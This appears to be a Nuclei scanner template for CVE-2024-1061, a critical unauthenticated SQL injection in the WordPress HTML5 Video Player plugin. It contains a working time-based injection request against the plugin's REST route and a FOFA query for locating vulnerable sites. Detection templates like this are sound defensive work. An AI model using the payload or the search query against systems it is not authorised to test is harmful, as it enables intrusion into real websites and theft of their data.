id: CVE-2024-1061 info: name: WordPress HTML5 Video Player - SQL Injection author: xxcdd severity: critical description: | WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks. impact: | Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site. remediation: | Vendor did not acknowledge vulnerability but the issue seems to have been fixed in version 2.5.25. reference: - https://www.tenable.com/security/research/tra-2024-02 - https://wordpress.org/plugins/html5-video-player - https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-1061 - https://github.com/tanjiti/sec_profile - https://github.com/JoshuaMart/JoshuaMart classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-1061 cwe-id: CWE-89 epss-score: 0.00934 epss-percentile: 0.82678 cpe: cpe:2.3:a:bplugins:html5_video_player:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: bplugins product: html5_video_player framework: wordpress fofa-query: "\"wordpress\" && body=\"html5-video-player\"" tags: time-based-sqli,cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player,bplugins http: - raw: - | @timeout: 20s GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'duration>=6' - 'contains(header, "application/json")' - 'contains_all(body, "created_at", "video_id")' condition: and # digest: 490a004630440220044ef882d07aef0ed44f3e31de398b83bb2f92a3a29a6717cb3da60e12b6a5ae02203a314e3c2e8edecf04982c8f22a17ea787c2c732334f20341b793e0f9896b2f6:922c64590222798bb761d5b6d8e72950